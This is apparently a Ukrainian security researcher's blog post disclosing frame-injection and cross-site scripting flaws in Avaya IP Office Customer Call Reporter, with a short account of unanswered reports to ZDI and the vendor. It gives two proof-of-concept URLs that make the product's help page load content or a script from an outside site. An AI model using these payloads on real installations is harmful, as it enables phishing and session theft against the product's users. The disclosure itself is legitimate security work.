Уразливості в Avaya IP Office Customer Call Reporter
23:58 20.08.2013У грудні, 06.12.2012, я знайшов Remote HTML Include та Remote XSS Include (Cross-Site Scripting) уразливості в Avaya IP Office Customer Call Reporter. Про що вже повідомив розробникам.
Спочатку я ще у грудні й січні повідомив ZDI про інші критичні уразливості в цьому продукті Avaya (про них я напишу пізніше, зараз наведу ці дірки). ZDI повільно відповідали і лише робили вигляд, що вони займаються цим питанням, лише у серпні активно взялися за справу, зв’язалися з Avaya, але ті не відповіли, тому ZDI відмовилися займатися цією справою. А у липні я повідомив розробникам (про ці дірки та інші критичні уразливості), але вони проігнорували моє повідомлення.
RHI (Frame Injection) (WASC-12):
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua
RXI (Cross-Site Scripting) (WASC-08):
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html
Вразливі Avaya IP Office Customer Call Reporter 8.0.9.13, 9.0.0.0 та попередні версії. Торік я перевірив у версії 8.0.9.13, а сьогодні в останній версії 9.0.0.0.